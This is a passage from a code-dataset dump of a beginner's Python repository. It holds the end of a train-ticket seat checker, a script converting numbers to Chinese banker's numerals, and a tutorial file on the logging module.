check_seat()\n\n\n# Fields of one result record, as returned by getSeat() and split on '|':\n# [1] 预订 (book button text)\n# [2] 240000K4730C\n# [3] K473  train number\n# [4] BJP\n# [5] KMM\n# [6] BJP\n# [7] BFF\n# [8] 16:16  departure time\n# [9] 05:57  arrival time\n# [10] 13:41  travel duration\n# [11] Y\n# [12] ZiGu2UrItHRf0TWQL%2Fpgp35uRTKLjh%2BfVFvsFlM1cUCXe2Knv5CIDrPScyk%3D\n# [13] 20171124\n# [14] 3\n# [15] PA\n# [16] 01\n# [17] 14\n# [18] 0\n# [19] 0\n# [20]\n# [21]\n# [22]\n# [23] 无  soft sleeper (无 = sold out, 有 = available)\n# [24]\n# [25]\n# [26] 有  no-seat ticket\n# [27]\n# [28] 无  hard sleeper\n# [29] 无  hard seat\n# [30] second-class seat\n# [31] first-class seat\n# [32] business-class seat\n# [33]\n# [34] 10401030\n# [35] 1413\n
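\n# Added usage sketch (an assumption-laden example, not in the original file: it\n# needs Python 2, network access to kyfw.12306.cn and a valid station table):\n# if __name__ == '__main__':\n#     check_seat()   # prints 'K261' and 'booking ticket' when the train is found\n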
" }, { "alpha_fraction": 0.2653525471687317, "alphanum_fraction": 0.2994692921638489, "avg_line_length": 15.891566276550293, "blob_id": "27259a04208993a17e5270b6865690c8561eec0f", "content_id": "4a288cb935489fcf2df6fe3d3e5d831f71b823ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1405, "license_type": "no_license", "max_line_length": 44, "num_lines": 83, "path": "/python学习/数字转中文大写.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2017-12-26\n\n__author__ = '@jiawenlong'\n\nimport re\n\n# digit -> Chinese banker's (anti-fraud) numeral\nbig = {\n    '1': '壹',\n    '2': '贰',\n    '3': '叁',\n    '4': '肆',\n    '5': '伍',\n    '6': '陆',\n    '7': '柒',\n    '8': '捌',\n    '9': '玖',\n    '0': '零'\n}\n# place markers for the integer part, indexed from the units digit upwards\ndw = {\n    -1: '',\n    0: '',\n    1: '元',\n    2: '拾',\n    3: '佰',\n    4: '仟',\n    5: '万',\n    6: '拾',\n    7: '佰',\n    8: '仟',\n    9: '亿'\n}\n# place markers for the decimal part: 角 = 1/10, 分 = 1/100, 厘 = 1/1000\nxs = {\n    0: '',\n    1: '角',\n    2: '分',\n    3: '厘',\n    4: ''\n}\n\n\ndef zhongwen(s):\n    end = ''\n    if re.findall(r'\\\\.', s):\n        z, f = s.split('.')\n        wei = len(z)\n        for i in z:\n            if i == '0':\n                end = end + ''  # zeros are simply skipped, a known simplification\n            else:\n                end = end + big[i] + dw[wei]\n            wei -= 1\n\n        if len(f) >= 4:  # keep at most three decimal places (角/分/厘)\n            f = f[0:3]\n        wei = 1\n\n        for i in f:\n            end = end + big[i] + xs[wei]\n            wei += 1\n        print(end)\n    else:\n        wei = len(s)\n        for i in s:\n            if i == '0':\n                end = end + ''  # zeros are simply skipped, so 105 -> 壹佰伍圆整 without 零\n            else:\n                # drop the 元 marker on the units digit; the trailing 圆整 closes the amount\n                end = end + big[i] + (dw[wei] if wei > 1 else '')\n            wei -= 1\n        end = end + \"圆整\"\n        print(end)\n\n\nif __name__ == '__main__':\n    num = input('Enter a number to convert _>:')\n    if num:\n        zhongwen(num)\n    else:\n        print(\"Please enter a number!!\")\n
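\n# Added sketch of expected output, hand-traced through the tables above:\n# zhongwen('123')    -> 壹佰贰拾叁圆整\n# zhongwen('105')    -> 壹佰伍圆整 (the missing 零 is the simplification noted above)\n# zhongwen('12.34')  -> 壹拾贰元叁角肆分\n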
" }, { "alpha_fraction": 0.6402662396430969, "alphanum_fraction": 0.6489184498786926, "avg_line_length": 29.049999237060547, "blob_id": "fb3c7a378ee4ab9cdadbc9ad1f9db5c82fb15e3c", "content_id": "d85ba8077c8608481ad04afaa248cd375c829cf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3527, "license_type": "no_license", "max_line_length": 111, "num_lines": 100, "path": "/python学习/模块/模块_logging.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-08\n\n__author__ = '@jiawenlong'\n\nimport logging\n\n# One: format placeholders\n# %(asctime)s  record time in readable form, millisecond precision by default,\n#              e.g. 2018-10-13 23:24:57,832; the datefmt argument overrides the format\n# %(name)s  name of the logger object\n# %(filename)s  file name without the path\n# %(pathname)s  file name with the full path\n# %(funcName)s  function containing the logging call\n# %(levelname)s  level name of the record\n# %(levelno)s  numeric level of the record\n# %(message)s  the logged message itself\n# %(lineno)d  line number of the logging call\n# %(process)d  current process ID\n# %(processName)s  current process name\n# %(thread)d  current thread ID\n# %(threadName)s  current thread name\n\n\n# # Level configuration\n# logging.basicConfig(level=logging.DEBUG,\n#                     format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n#                     datefmt='%a,%d %b %Y %H:%M:%S',\n#                     # weekday, day month year, time\n#                     filename='test.log',\n#                     filemode='a')  # 'a' appends, 'w' truncates\n#\n# logging.debug(' this is debug message')\n# logging.info(' this is info messages')\n# logging.warning(' this is warning messages')\n# logging.error(' this is error messages')\n# logging.critical(' this is critical messages')\n\n\n# # Two\n# logger = logging.getLogger(\"aaa\")\n# # logger = logging.getLogger()  # create the logger object\n# logger.setLevel(logging.DEBUG)\n# fh = logging.FileHandler('test.log')  # a handler that writes records to a log file\n# ch = logging.StreamHandler()  # a handler that writes records to the screen\n# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')  # output format object\n#\n# # attach the output format to both handlers\n# fh.setFormatter(formatter)\n# ch.setFormatter(formatter)\n#\n# # register the handlers on the logger\n# logger.addHandler(fh)\n# logger.addHandler(ch)\n#\n# # calls\n# logger.debug(' this is debug message')\n# logger.info(' this is info messages')\n# logger.warning(' this is warning messages')\n# logger.error(' this is error messages')\n# logger.critical(' this is critical messages')\n\n\n# Second pass at this module\n\n# logging.basicConfig(\n#     level=logging.DEBUG,\n#     format='%(asctime)s %(filename)s %(name)s [line:%(lineno)d] %(levelname)s %(message)s %(levelno)s ',\n#     # the %(...)s variable names are fixed; literal label text such as 'line:' can be edited\n#     datefmt='%a %d %b %Y %H:%M:%S',\n#     # datefmt example: datefmt=\"%d-%m-%Y %H:%M:%S\"\n#     # filename='test.log',\n#     # filemode='a+'\n# )\n# logging.debug('This is logging.debug')\n# logging.info('This is logging.info')\n# logging.warning('This is logging.warning')\n# logging.error('This is logging.error')\n# logging.critical(\"This is logging.critical\")\n\nlogger = logging.getLogger()\nfile_h = logging.FileHandler('test.log')\nstream_h = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s %(filename)s %(name)s [line:%(lineno)d] %(levelname)s %(message)s')\n\nfile_h.setFormatter(formatter)\n# stream_h.setFormatter(formatter)  # left unset, so the console shows the bare message\n\nlogger.addHandler(file_h)\nlogger.addHandler(stream_h)\n\nlogger.setLevel(logging.DEBUG)\nlogger.debug('This is logging.debug')\nlogger.info('This is logging.info')\nlogger.warning('This is logging.warning')\nlogger.error('This is logging.error')\nlogger.critical(\"This is logging.critical\")\n" } ]
48